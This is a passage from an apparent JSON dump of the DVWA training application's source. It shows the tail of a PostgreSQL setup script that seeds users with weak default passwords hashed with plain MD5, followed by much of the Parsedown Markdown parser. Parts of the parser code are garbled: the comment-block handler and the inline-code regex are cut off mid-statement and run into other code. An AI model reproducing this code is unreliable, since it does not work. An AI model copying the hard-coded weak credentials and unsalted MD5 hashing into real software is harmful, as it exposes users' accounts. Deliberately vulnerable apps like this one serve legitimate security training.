SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\ndvwaMessagePush( \"Database has been created.\" );\r\n\r\n\r\n// Connect to server AND connect to the database\r\n$dbconn = @pg_connect(\"host={$_DVWA[ 'db_server' ]} port={$_DVWA[ 'db_port' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ]}\");\r\n\r\n\r\n// Create table 'users'\r\n\r\n$drop_table = \"DROP TABLE IF EXISTS users;\";\r\n\r\nif( !pg_query($drop_table) ) {\r\n\tdvwaMessagePush( \"Could not drop existing users table
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\n$create_tb = \"CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));\";\r\n\r\nif( !pg_query( $create_tb ) ) {\r\n\tdvwaMessagePush( \"Table could not be created
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\ndvwaMessagePush( \"'users' table was created.\" );\r\n\r\n// Get the base directory for the avatar media...\r\n$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ];\r\n$stripPos = strpos( $baseUrl, 'dvwa/setup.php' );\r\n$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/';\r\n\r\n$insert = \"INSERT INTO users VALUES\r\n\t('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'),\r\n\t('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'),\r\n\t('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'),\r\n\t('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'),\r\n\t('5','bob','smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');\";\r\nif( !pg_query( $insert ) ) {\r\n\tdvwaMessagePush( \"Data could not be inserted into 'users' table
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\ndvwaMessagePush( \"Data inserted into 'users' table.\" );\r\n\r\n// Create guestbook table\r\n\r\n$drop_table = \"DROP table IF EXISTS guestbook;\";\r\n\r\nif( !@pg_query($drop_table) ) {\r\n\tdvwaMessagePush( \"Could not drop existing users table
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\n$create_tb_guestbook = \"CREATE TABLE guestbook (comment text, name text, comment_id SERIAL PRIMARY KEY);\";\r\n\r\nif( !pg_query( $create_tb_guestbook ) ) {\r\n\tdvwaMessagePush( \"guestbook table could not be created
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\n\r\ndvwaMessagePush( \"'guestbook' table was created.\" );\r\n\r\n// Insert data into 'guestbook'\r\n$insert = \"INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')\";\r\n\r\nif( !pg_query( $insert ) ) {\r\n\tdvwaMessagePush( \"Data could not be inserted into 'guestbook' table
SQL: \" . pg_last_error() );\r\n\tdvwaPageReload();\r\n}\r\ndvwaMessagePush( \"Data inserted into 'guestbook' table.\" );\r\n\r\ndvwaMessagePush( \"Setup successful!\" );\r\ndvwaPageReload();\r\n\r\npg_close($dbconn);\r\n\r\n?>\r\n" }, { "path": "dvwa/includes/Parsedown.php", "content": "textElements($text);\n\n # convert to markup\n $markup = $this->elements($Elements);\n\n # trim line breaks\n $markup = trim($markup, \"\\n\");\n\n return $markup;\n }\n\n protected function textElements($text)\n {\n # make sure no definitions are set\n $this->DefinitionData = array();\n\n # standardize line breaks\n $text = str_replace(array(\"\\r\\n\", \"\\r\"), \"\\n\", $text);\n\n # remove surrounding line breaks\n $text = trim($text, \"\\n\");\n\n # split text into lines\n $lines = explode(\"\\n\", $text);\n\n # iterate through lines to identify blocks\n return $this->linesElements($lines);\n }\n\n #\n # Setters\n #\n\n function setBreaksEnabled($breaksEnabled)\n {\n $this->breaksEnabled = $breaksEnabled;\n\n return $this;\n }\n\n protected $breaksEnabled;\n\n function setMarkupEscaped($markupEscaped)\n {\n $this->markupEscaped = $markupEscaped;\n\n return $this;\n }\n\n protected $markupEscaped;\n\n function setUrlsLinked($urlsLinked)\n {\n $this->urlsLinked = $urlsLinked;\n\n return $this;\n }\n\n protected $urlsLinked = true;\n\n function setSafeMode($safeMode)\n {\n $this->safeMode = (bool) $safeMode;\n\n return $this;\n }\n\n protected $safeMode;\n\n function setStrictMode($strictMode)\n {\n $this->strictMode = (bool) $strictMode;\n\n return $this;\n }\n\n protected $strictMode;\n\n protected $safeLinksWhitelist = array(\n 'http://',\n 'https://',\n 'ftp://',\n 'ftps://',\n 'mailto:',\n 'tel:',\n 'data:image/png;base64,',\n 'data:image/gif;base64,',\n 'data:image/jpeg;base64,',\n 'irc:',\n 'ircs:',\n 'git:',\n 'ssh:',\n 'news:',\n 'steam:',\n );\n\n #\n # Lines\n #\n\n protected $BlockTypes = array(\n '#' => array('Header'),\n '*' => array('Rule', 'List'),\n '+' => array('List'),\n '-' => array('SetextHeader', 'Table', 'Rule', 'List'),\n '0' => array('List'),\n '1' => array('List'),\n '2' => array('List'),\n '3' => array('List'),\n '4' => array('List'),\n '5' => array('List'),\n '6' => array('List'),\n '7' => array('List'),\n '8' => array('List'),\n '9' => array('List'),\n ':' => array('Table'),\n '<' => array('Comment', 'Markup'),\n '=' => array('SetextHeader'),\n '>' => array('Quote'),\n '[' => array('Reference'),\n '_' => array('Rule'),\n '`' => array('FencedCode'),\n '|' => array('Table'),\n '~' => array('FencedCode'),\n );\n\n # ~\n\n protected $unmarkedBlockTypes = array(\n 'Code',\n );\n\n #\n # Blocks\n #\n\n protected function lines(array $lines)\n {\n return $this->elements($this->linesElements($lines));\n }\n\n protected function linesElements(array $lines)\n {\n $Elements = array();\n $CurrentBlock = null;\n\n foreach ($lines as $line)\n {\n if (chop($line) === '')\n {\n if (isset($CurrentBlock))\n {\n $CurrentBlock['interrupted'] = (isset($CurrentBlock['interrupted'])\n ? $CurrentBlock['interrupted'] + 1 : 1\n );\n }\n\n continue;\n }\n\n while (($beforeTab = strstr($line, \"\\t\", true)) !== false)\n {\n $shortage = 4 - mb_strlen($beforeTab, 'utf-8') % 4;\n\n $line = $beforeTab\n . str_repeat(' ', $shortage)\n . substr($line, strlen($beforeTab) + 1)\n ;\n }\n\n $indent = strspn($line, ' ');\n\n $text = $indent > 0 ? substr($line, $indent) : $line;\n\n # ~\n\n $Line = array('body' => $line, 'indent' => $indent, 'text' => $text);\n\n # ~\n\n if (isset($CurrentBlock['continuable']))\n {\n $methodName = 'block' . $CurrentBlock['type'] . 'Continue';\n $Block = $this->$methodName($Line, $CurrentBlock);\n\n if (isset($Block))\n {\n $CurrentBlock = $Block;\n\n continue;\n }\n else\n {\n if ($this->isBlockCompletable($CurrentBlock['type']))\n {\n $methodName = 'block' . $CurrentBlock['type'] . 'Complete';\n $CurrentBlock = $this->$methodName($CurrentBlock);\n }\n }\n }\n\n # ~\n\n $marker = $text[0];\n\n # ~\n\n $blockTypes = $this->unmarkedBlockTypes;\n\n if (isset($this->BlockTypes[$marker]))\n {\n foreach ($this->BlockTypes[$marker] as $blockType)\n {\n $blockTypes []= $blockType;\n }\n }\n\n #\n # ~\n\n foreach ($blockTypes as $blockType)\n {\n $Block = $this->{\"block$blockType\"}($Line, $CurrentBlock);\n\n if (isset($Block))\n {\n $Block['type'] = $blockType;\n\n if ( ! isset($Block['identified']))\n {\n if (isset($CurrentBlock))\n {\n $Elements[] = $this->extractElement($CurrentBlock);\n }\n\n $Block['identified'] = true;\n }\n\n if ($this->isBlockContinuable($blockType))\n {\n $Block['continuable'] = true;\n }\n\n $CurrentBlock = $Block;\n\n continue 2;\n }\n }\n\n # ~\n\n if (isset($CurrentBlock) and $CurrentBlock['type'] === 'Paragraph')\n {\n $Block = $this->paragraphContinue($Line, $CurrentBlock);\n }\n\n if (isset($Block))\n {\n $CurrentBlock = $Block;\n }\n else\n {\n if (isset($CurrentBlock))\n {\n $Elements[] = $this->extractElement($CurrentBlock);\n }\n\n $CurrentBlock = $this->paragraph($Line);\n\n $CurrentBlock['identified'] = true;\n }\n }\n\n # ~\n\n if (isset($CurrentBlock['continuable']) and $this->isBlockCompletable($CurrentBlock['type']))\n {\n $methodName = 'block' . $CurrentBlock['type'] . 'Complete';\n $CurrentBlock = $this->$methodName($CurrentBlock);\n }\n\n # ~\n\n if (isset($CurrentBlock))\n {\n $Elements[] = $this->extractElement($CurrentBlock);\n }\n\n # ~\n\n return $Elements;\n }\n\n protected function extractElement(array $Component)\n {\n if ( ! isset($Component['element']))\n {\n if (isset($Component['markup']))\n {\n $Component['element'] = array('rawHtml' => $Component['markup']);\n }\n elseif (isset($Component['hidden']))\n {\n $Component['element'] = array();\n }\n }\n\n return $Component['element'];\n }\n\n protected function isBlockContinuable($Type)\n {\n return method_exists($this, 'block' . $Type . 'Continue');\n }\n\n protected function isBlockCompletable($Type)\n {\n return method_exists($this, 'block' . $Type . 'Complete');\n }\n\n #\n # Code\n\n protected function blockCode($Line, $Block = null)\n {\n if (isset($Block) and $Block['type'] === 'Paragraph' and ! isset($Block['interrupted']))\n {\n return;\n }\n\n if ($Line['indent'] >= 4)\n {\n $text = substr($Line['body'], 4);\n\n $Block = array(\n 'element' => array(\n 'name' => 'pre',\n 'element' => array(\n 'name' => 'code',\n 'text' => $text,\n ),\n ),\n );\n\n return $Block;\n }\n }\n\n protected function blockCodeContinue($Line, $Block)\n {\n if ($Line['indent'] >= 4)\n {\n if (isset($Block['interrupted']))\n {\n $Block['element']['element']['text'] .= str_repeat(\"\\n\", $Block['interrupted']);\n\n unset($Block['interrupted']);\n }\n\n $Block['element']['element']['text'] .= \"\\n\";\n\n $text = substr($Line['body'], 4);\n\n $Block['element']['element']['text'] .= $text;\n\n return $Block;\n }\n }\n\n protected function blockCodeComplete($Block)\n {\n return $Block;\n }\n\n #\n # Comment\n\n protected function blockComment($Line)\n {\n if ($this->markupEscaped or $this->safeMode)\n {\n return;\n }\n\n if (strpos($Line['text'], '') !== false)\n {\n $Block['closed'] = true;\n }\n\n return $Block;\n }\n }\n\n protected function blockCommentContinue($Line, array $Block)\n {\n if (isset($Block['closed']))\n {\n return;\n }\n\n $Block['element']['rawHtml'] .= \"\\n\" . $Line['body'];\n\n if (strpos($Line['text'], '-->') !== false)\n {\n $Block['closed'] = true;\n }\n\n return $Block;\n }\n\n #\n # Fenced Code\n\n protected function blockFencedCode($Line)\n {\n $marker = $Line['text'][0];\n\n $openerLength = strspn($Line['text'], $marker);\n\n if ($openerLength < 3)\n {\n return;\n }\n\n $infostring = trim(substr($Line['text'], $openerLength), \"\\t \");\n\n if (strpos($infostring, '`') !== false)\n {\n return;\n }\n\n $Element = array(\n 'name' => 'code',\n 'text' => '',\n );\n\n if ($infostring !== '')\n {\n /**\n * https://www.w3.org/TR/2011/WD-html5-20110525/elements.html#classes\n * Every HTML element may have a class attribute specified.\n * The attribute, if specified, must have a value that is a set\n * of space-separated tokens representing the various classes\n * that the element belongs to.\n * [...]\n * The space characters, for the purposes of this specification,\n * are U+0020 SPACE, U+0009 CHARACTER TABULATION (tab),\n * U+000A LINE FEED (LF), U+000C FORM FEED (FF), and\n * U+000D CARRIAGE RETURN (CR).\n */\n $language = substr($infostring, 0, strcspn($infostring, \" \\t\\n\\f\\r\"));\n\n $Element['attributes'] = array('class' => \"language-$language\");\n }\n\n $Block = array(\n 'char' => $marker,\n 'openerLength' => $openerLength,\n 'element' => array(\n 'name' => 'pre',\n 'element' => $Element,\n ),\n );\n\n return $Block;\n }\n\n protected function blockFencedCodeContinue($Line, $Block)\n {\n if (isset($Block['complete']))\n {\n return;\n }\n\n if (isset($Block['interrupted']))\n {\n $Block['element']['element']['text'] .= str_repeat(\"\\n\", $Block['interrupted']);\n\n unset($Block['interrupted']);\n }\n\n if (($len = strspn($Line['text'], $Block['char'])) >= $Block['openerLength']\n and chop(substr($Line['text'], $len), ' ') === ''\n ) {\n $Block['element']['element']['text'] = substr($Block['element']['element']['text'], 1);\n\n $Block['complete'] = true;\n\n return $Block;\n }\n\n $Block['element']['element']['text'] .= \"\\n\" . $Line['body'];\n\n return $Block;\n }\n\n protected function blockFencedCodeComplete($Block)\n {\n return $Block;\n }\n\n #\n # Header\n\n protected function blockHeader($Line)\n {\n $level = strspn($Line['text'], '#');\n\n if ($level > 6)\n {\n return;\n }\n\n $text = trim($Line['text'], '#');\n\n if ($this->strictMode and isset($text[0]) and $text[0] !== ' ')\n {\n return;\n }\n\n $text = trim($text, ' ');\n\n $Block = array(\n 'element' => array(\n 'name' => 'h' . $level,\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => $text,\n 'destination' => 'elements',\n )\n ),\n );\n\n return $Block;\n }\n\n #\n # List\n\n protected function blockList($Line, array $CurrentBlock = null)\n {\n list($name, $pattern) = $Line['text'][0] <= '-' ? array('ul', '[*+-]') : array('ol', '[0-9]{1,9}+[.\\)]');\n\n if (preg_match('/^('.$pattern.'([ ]++|$))(.*+)/', $Line['text'], $matches))\n {\n $contentIndent = strlen($matches[2]);\n\n if ($contentIndent >= 5)\n {\n $contentIndent -= 1;\n $matches[1] = substr($matches[1], 0, -$contentIndent);\n $matches[3] = str_repeat(' ', $contentIndent) . $matches[3];\n }\n elseif ($contentIndent === 0)\n {\n $matches[1] .= ' ';\n }\n\n $markerWithoutWhitespace = strstr($matches[1], ' ', true);\n\n $Block = array(\n 'indent' => $Line['indent'],\n 'pattern' => $pattern,\n 'data' => array(\n 'type' => $name,\n 'marker' => $matches[1],\n 'markerType' => ($name === 'ul' ? $markerWithoutWhitespace : substr($markerWithoutWhitespace, -1)),\n ),\n 'element' => array(\n 'name' => $name,\n 'elements' => array(),\n ),\n );\n $Block['data']['markerTypeRegex'] = preg_quote($Block['data']['markerType'], '/');\n\n if ($name === 'ol')\n {\n $listStart = ltrim(strstr($matches[1], $Block['data']['markerType'], true), '0') ?: '0';\n\n if ($listStart !== '1')\n {\n if (\n isset($CurrentBlock)\n and $CurrentBlock['type'] === 'Paragraph'\n and ! isset($CurrentBlock['interrupted'])\n ) {\n return;\n }\n\n $Block['element']['attributes'] = array('start' => $listStart);\n }\n }\n\n $Block['li'] = array(\n 'name' => 'li',\n 'handler' => array(\n 'function' => 'li',\n 'argument' => !empty($matches[3]) ? array($matches[3]) : array(),\n 'destination' => 'elements'\n )\n );\n\n $Block['element']['elements'] []= & $Block['li'];\n\n return $Block;\n }\n }\n\n protected function blockListContinue($Line, array $Block)\n {\n if (isset($Block['interrupted']) and empty($Block['li']['handler']['argument']))\n {\n return null;\n }\n\n $requiredIndent = ($Block['indent'] + strlen($Block['data']['marker']));\n\n if ($Line['indent'] < $requiredIndent\n and (\n (\n $Block['data']['type'] === 'ol'\n and preg_match('/^[0-9]++'.$Block['data']['markerTypeRegex'].'(?:[ ]++(.*)|$)/', $Line['text'], $matches)\n ) or (\n $Block['data']['type'] === 'ul'\n and preg_match('/^'.$Block['data']['markerTypeRegex'].'(?:[ ]++(.*)|$)/', $Line['text'], $matches)\n )\n )\n ) {\n if (isset($Block['interrupted']))\n {\n $Block['li']['handler']['argument'] []= '';\n\n $Block['loose'] = true;\n\n unset($Block['interrupted']);\n }\n\n unset($Block['li']);\n\n $text = isset($matches[1]) ? $matches[1] : '';\n\n $Block['indent'] = $Line['indent'];\n\n $Block['li'] = array(\n 'name' => 'li',\n 'handler' => array(\n 'function' => 'li',\n 'argument' => array($text),\n 'destination' => 'elements'\n )\n );\n\n $Block['element']['elements'] []= & $Block['li'];\n\n return $Block;\n }\n elseif ($Line['indent'] < $requiredIndent and $this->blockList($Line))\n {\n return null;\n }\n\n if ($Line['text'][0] === '[' and $this->blockReference($Line))\n {\n return $Block;\n }\n\n if ($Line['indent'] >= $requiredIndent)\n {\n if (isset($Block['interrupted']))\n {\n $Block['li']['handler']['argument'] []= '';\n\n $Block['loose'] = true;\n\n unset($Block['interrupted']);\n }\n\n $text = substr($Line['body'], $requiredIndent);\n\n $Block['li']['handler']['argument'] []= $text;\n\n return $Block;\n }\n\n if ( ! isset($Block['interrupted']))\n {\n $text = preg_replace('/^[ ]{0,'.$requiredIndent.'}+/', '', $Line['body']);\n\n $Block['li']['handler']['argument'] []= $text;\n\n return $Block;\n }\n }\n\n protected function blockListComplete(array $Block)\n {\n if (isset($Block['loose']))\n {\n foreach ($Block['element']['elements'] as &$li)\n {\n if (end($li['handler']['argument']) !== '')\n {\n $li['handler']['argument'] []= '';\n }\n }\n }\n\n return $Block;\n }\n\n #\n # Quote\n\n protected function blockQuote($Line)\n {\n if (preg_match('/^>[ ]?+(.*+)/', $Line['text'], $matches))\n {\n $Block = array(\n 'element' => array(\n 'name' => 'blockquote',\n 'handler' => array(\n 'function' => 'linesElements',\n 'argument' => (array) $matches[1],\n 'destination' => 'elements',\n )\n ),\n );\n\n return $Block;\n }\n }\n\n protected function blockQuoteContinue($Line, array $Block)\n {\n if (isset($Block['interrupted']))\n {\n return;\n }\n\n if ($Line['text'][0] === '>' and preg_match('/^>[ ]?+(.*+)/', $Line['text'], $matches))\n {\n $Block['element']['handler']['argument'] []= $matches[1];\n\n return $Block;\n }\n\n if ( ! isset($Block['interrupted']))\n {\n $Block['element']['handler']['argument'] []= $Line['text'];\n\n return $Block;\n }\n }\n\n #\n # Rule\n\n protected function blockRule($Line)\n {\n $marker = $Line['text'][0];\n\n if (substr_count($Line['text'], $marker) >= 3 and chop($Line['text'], \" $marker\") === '')\n {\n $Block = array(\n 'element' => array(\n 'name' => 'hr',\n ),\n );\n\n return $Block;\n }\n }\n\n #\n # Setext\n\n protected function blockSetextHeader($Line, array $Block = null)\n {\n if ( ! isset($Block) or $Block['type'] !== 'Paragraph' or isset($Block['interrupted']))\n {\n return;\n }\n\n if ($Line['indent'] < 4 and chop(chop($Line['text'], ' '), $Line['text'][0]) === '')\n {\n $Block['element']['name'] = $Line['text'][0] === '=' ? 'h1' : 'h2';\n\n return $Block;\n }\n }\n\n #\n # Markup\n\n protected function blockMarkup($Line)\n {\n if ($this->markupEscaped or $this->safeMode)\n {\n return;\n }\n\n if (preg_match('/^<[\\/]?+(\\w*)(?:[ ]*+'.$this->regexHtmlAttribute.')*+[ ]*+(\\/)?>/', $Line['text'], $matches))\n {\n $element = strtolower($matches[1]);\n\n if (in_array($element, $this->textLevelElements))\n {\n return;\n }\n\n $Block = array(\n 'name' => $matches[1],\n 'element' => array(\n 'rawHtml' => $Line['text'],\n 'autobreak' => true,\n ),\n );\n\n return $Block;\n }\n }\n\n protected function blockMarkupContinue($Line, array $Block)\n {\n if (isset($Block['closed']) or isset($Block['interrupted']))\n {\n return;\n }\n\n $Block['element']['rawHtml'] .= \"\\n\" . $Line['body'];\n\n return $Block;\n }\n\n #\n # Reference\n\n protected function blockReference($Line)\n {\n if (strpos($Line['text'], ']') !== false\n and preg_match('/^\\[(.+?)\\]:[ ]*+?(?:[ ]+[\"\\'(](.+)[\"\\')])?[ ]*+$/', $Line['text'], $matches)\n ) {\n $id = strtolower($matches[1]);\n\n $Data = array(\n 'url' => $matches[2],\n 'title' => isset($matches[3]) ? $matches[3] : null,\n );\n\n $this->DefinitionData['Reference'][$id] = $Data;\n\n $Block = array(\n 'element' => array(),\n );\n\n return $Block;\n }\n }\n\n #\n # Table\n\n protected function blockTable($Line, array $Block = null)\n {\n if ( ! isset($Block) or $Block['type'] !== 'Paragraph' or isset($Block['interrupted']))\n {\n return;\n }\n\n if (\n strpos($Block['element']['handler']['argument'], '|') === false\n and strpos($Line['text'], '|') === false\n and strpos($Line['text'], ':') === false\n or strpos($Block['element']['handler']['argument'], \"\\n\") !== false\n ) {\n return;\n }\n\n if (chop($Line['text'], ' -:|') !== '')\n {\n return;\n }\n\n $alignments = array();\n\n $divider = $Line['text'];\n\n $divider = trim($divider);\n $divider = trim($divider, '|');\n\n $dividerCells = explode('|', $divider);\n\n foreach ($dividerCells as $dividerCell)\n {\n $dividerCell = trim($dividerCell);\n\n if ($dividerCell === '')\n {\n return;\n }\n\n $alignment = null;\n\n if ($dividerCell[0] === ':')\n {\n $alignment = 'left';\n }\n\n if (substr($dividerCell, - 1) === ':')\n {\n $alignment = $alignment === 'left' ? 'center' : 'right';\n }\n\n $alignments []= $alignment;\n }\n\n # ~\n\n $HeaderElements = array();\n\n $header = $Block['element']['handler']['argument'];\n\n $header = trim($header);\n $header = trim($header, '|');\n\n $headerCells = explode('|', $header);\n\n if (count($headerCells) !== count($alignments))\n {\n return;\n }\n\n foreach ($headerCells as $index => $headerCell)\n {\n $headerCell = trim($headerCell);\n\n $HeaderElement = array(\n 'name' => 'th',\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => $headerCell,\n 'destination' => 'elements',\n )\n );\n\n if (isset($alignments[$index]))\n {\n $alignment = $alignments[$index];\n\n $HeaderElement['attributes'] = array(\n 'style' => \"text-align: $alignment;\",\n );\n }\n\n $HeaderElements []= $HeaderElement;\n }\n\n # ~\n\n $Block = array(\n 'alignments' => $alignments,\n 'identified' => true,\n 'element' => array(\n 'name' => 'table',\n 'elements' => array(),\n ),\n );\n\n $Block['element']['elements'] []= array(\n 'name' => 'thead',\n );\n\n $Block['element']['elements'] []= array(\n 'name' => 'tbody',\n 'elements' => array(),\n );\n\n $Block['element']['elements'][0]['elements'] []= array(\n 'name' => 'tr',\n 'elements' => $HeaderElements,\n );\n\n return $Block;\n }\n\n protected function blockTableContinue($Line, array $Block)\n {\n if (isset($Block['interrupted']))\n {\n return;\n }\n\n if (count($Block['alignments']) === 1 or $Line['text'][0] === '|' or strpos($Line['text'], '|'))\n {\n $Elements = array();\n\n $row = $Line['text'];\n\n $row = trim($row);\n $row = trim($row, '|');\n\n preg_match_all('/(?:(\\\\\\\\[|])|[^|`]|`[^`]++`|`)++/', $row, $matches);\n\n $cells = array_slice($matches[0], 0, count($Block['alignments']));\n\n foreach ($cells as $index => $cell)\n {\n $cell = trim($cell);\n\n $Element = array(\n 'name' => 'td',\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => $cell,\n 'destination' => 'elements',\n )\n );\n\n if (isset($Block['alignments'][$index]))\n {\n $Element['attributes'] = array(\n 'style' => 'text-align: ' . $Block['alignments'][$index] . ';',\n );\n }\n\n $Elements []= $Element;\n }\n\n $Element = array(\n 'name' => 'tr',\n 'elements' => $Elements,\n );\n\n $Block['element']['elements'][1]['elements'] []= $Element;\n\n return $Block;\n }\n }\n\n #\n # ~\n #\n\n protected function paragraph($Line)\n {\n return array(\n 'type' => 'Paragraph',\n 'element' => array(\n 'name' => 'p',\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => $Line['text'],\n 'destination' => 'elements',\n ),\n ),\n );\n }\n\n protected function paragraphContinue($Line, array $Block)\n {\n if (isset($Block['interrupted']))\n {\n return;\n }\n\n $Block['element']['handler']['argument'] .= \"\\n\".$Line['text'];\n\n return $Block;\n }\n\n #\n # Inline Elements\n #\n\n protected $InlineTypes = array(\n '!' => array('Image'),\n '&' => array('SpecialCharacter'),\n '*' => array('Emphasis'),\n ':' => array('Url'),\n '<' => array('UrlTag', 'EmailTag', 'Markup'),\n '[' => array('Link'),\n '_' => array('Emphasis'),\n '`' => array('Code'),\n '~' => array('Strikethrough'),\n '\\\\' => array('EscapeSequence'),\n );\n\n # ~\n\n protected $inlineMarkerList = '!*_&[:<`~\\\\';\n\n #\n # ~\n #\n\n public function line($text, $nonNestables = array())\n {\n return $this->elements($this->lineElements($text, $nonNestables));\n }\n\n protected function lineElements($text, $nonNestables = array())\n {\n # standardize line breaks\n $text = str_replace(array(\"\\r\\n\", \"\\r\"), \"\\n\", $text);\n\n $Elements = array();\n\n $nonNestables = (empty($nonNestables)\n ? array()\n : array_combine($nonNestables, $nonNestables)\n );\n\n # $excerpt is based on the first occurrence of a marker\n\n while ($excerpt = strpbrk($text, $this->inlineMarkerList))\n {\n $marker = $excerpt[0];\n\n $markerPosition = strlen($text) - strlen($excerpt);\n\n $Excerpt = array('text' => $excerpt, 'context' => $text);\n\n foreach ($this->InlineTypes[$marker] as $inlineType)\n {\n # check to see if the current inline type is nestable in the current context\n\n if (isset($nonNestables[$inlineType]))\n {\n continue;\n }\n\n $Inline = $this->{\"inline$inlineType\"}($Excerpt);\n\n if ( ! isset($Inline))\n {\n continue;\n }\n\n # makes sure that the inline belongs to \"our\" marker\n\n if (isset($Inline['position']) and $Inline['position'] > $markerPosition)\n {\n continue;\n }\n\n # sets a default inline position\n\n if ( ! isset($Inline['position']))\n {\n $Inline['position'] = $markerPosition;\n }\n\n # cause the new element to 'inherit' our non nestables\n\n\n $Inline['element']['nonNestables'] = isset($Inline['element']['nonNestables'])\n ? array_merge($Inline['element']['nonNestables'], $nonNestables)\n : $nonNestables\n ;\n\n # the text that comes before the inline\n $unmarkedText = substr($text, 0, $Inline['position']);\n\n # compile the unmarked text\n $InlineText = $this->inlineText($unmarkedText);\n $Elements[] = $InlineText['element'];\n\n # compile the inline\n $Elements[] = $this->extractElement($Inline);\n\n # remove the examined text\n $text = substr($text, $Inline['position'] + $Inline['extent']);\n\n continue 2;\n }\n\n # the marker does not belong to an inline\n\n $unmarkedText = substr($text, 0, $markerPosition + 1);\n\n $InlineText = $this->inlineText($unmarkedText);\n $Elements[] = $InlineText['element'];\n\n $text = substr($text, $markerPosition + 1);\n }\n\n $InlineText = $this->inlineText($text);\n $Elements[] = $InlineText['element'];\n\n foreach ($Elements as &$Element)\n {\n if ( ! isset($Element['autobreak']))\n {\n $Element['autobreak'] = false;\n }\n }\n\n return $Elements;\n }\n\n #\n # ~\n #\n\n protected function inlineText($text)\n {\n $Inline = array(\n 'extent' => strlen($text),\n 'element' => array(),\n );\n\n $Inline['element']['elements'] = self::pregReplaceElements(\n $this->breaksEnabled ? '/[ ]*+\\n/' : '/(?:[ ]*+\\\\\\\\|[ ]{2,}+)\\n/',\n array(\n array('name' => 'br'),\n array('text' => \"\\n\"),\n ),\n $text\n );\n\n return $Inline;\n }\n\n protected function inlineCode($Excerpt)\n {\n $marker = $Excerpt['text'][0];\n\n if (preg_match('/^(['.$marker.']++)[ ]*+(.+?)[ ]*+(? strlen($matches[0]),\n 'element' => array(\n 'name' => 'code',\n 'text' => $text,\n ),\n );\n }\n }\n\n protected function inlineEmailTag($Excerpt)\n {\n $hostnameLabel = '[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?';\n\n $commonMarkEmail = '[a-zA-Z0-9.!#$%&\\'*+\\/=?^_`{|}~-]++@'\n . $hostnameLabel . '(?:\\.' . $hostnameLabel . ')*';\n\n if (strpos($Excerpt['text'], '>') !== false\n and preg_match(\"/^<((mailto:)?$commonMarkEmail)>/i\", $Excerpt['text'], $matches)\n ){\n $url = $matches[1];\n\n if ( ! isset($matches[2]))\n {\n $url = \"mailto:$url\";\n }\n\n return array(\n 'extent' => strlen($matches[0]),\n 'element' => array(\n 'name' => 'a',\n 'text' => $matches[1],\n 'attributes' => array(\n 'href' => $url,\n ),\n ),\n );\n }\n }\n\n protected function inlineEmphasis($Excerpt)\n {\n if ( ! isset($Excerpt['text'][1]))\n {\n return;\n }\n\n $marker = $Excerpt['text'][0];\n\n if ($Excerpt['text'][1] === $marker and preg_match($this->StrongRegex[$marker], $Excerpt['text'], $matches))\n {\n $emphasis = 'strong';\n }\n elseif (preg_match($this->EmRegex[$marker], $Excerpt['text'], $matches))\n {\n $emphasis = 'em';\n }\n else\n {\n return;\n }\n\n return array(\n 'extent' => strlen($matches[0]),\n 'element' => array(\n 'name' => $emphasis,\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => $matches[1],\n 'destination' => 'elements',\n )\n ),\n );\n }\n\n protected function inlineEscapeSequence($Excerpt)\n {\n if (isset($Excerpt['text'][1]) and in_array($Excerpt['text'][1], $this->specialCharacters))\n {\n return array(\n 'element' => array('rawHtml' => $Excerpt['text'][1]),\n 'extent' => 2,\n );\n }\n }\n\n protected function inlineImage($Excerpt)\n {\n if ( ! isset($Excerpt['text'][1]) or $Excerpt['text'][1] !== '[')\n {\n return;\n }\n\n $Excerpt['text']= substr($Excerpt['text'], 1);\n\n $Link = $this->inlineLink($Excerpt);\n\n if ($Link === null)\n {\n return;\n }\n\n $Inline = array(\n 'extent' => $Link['extent'] + 1,\n 'element' => array(\n 'name' => 'img',\n 'attributes' => array(\n 'src' => $Link['element']['attributes']['href'],\n 'alt' => $Link['element']['handler']['argument'],\n ),\n 'autobreak' => true,\n ),\n );\n\n $Inline['element']['attributes'] += $Link['element']['attributes'];\n\n unset($Inline['element']['attributes']['href']);\n\n return $Inline;\n }\n\n protected function inlineLink($Excerpt)\n {\n $Element = array(\n 'name' => 'a',\n 'handler' => array(\n 'function' => 'lineElements',\n 'argument' => null,\n 'destination' => 'elements',\n ),\n 'nonNestables' => array('Url', 'Link'),\n 'attributes' => array(\n 'href' => null,\n 'title' => null,\n ),\n );\n\n $extent = 0;\n\n $remainder = $Excerpt['text'];\n\n if (preg_match('/\\[((?:[^][]++|(?R))*+)\\]/', $remainder, $matches))\n {\n $Element['handler']['argument'] = $matches[1];\n\n $extent += strlen($matches[0]);\n\n $remainder = substr($remainder, $extent);\n }\n else\n {\n return;\n }\n\n if (preg_match('/^[(]\\s*+((?:[^ ()]++|[(][^ )]+[)])++)(?:[ ]+(\"[^\"]*+\"|\\'[^\\']*+\\'))?\\s*+[)]/', $remainder, $matches))\n {\n $Element['attributes']['href'] = $matches[1];\n\n if (isset($matches[2]))\n {\n $Element['attributes']['title'] = substr($matches[2], 1, - 1);\n }\n\n $extent += strlen($matches[0]);\n }\n else\n {\n if 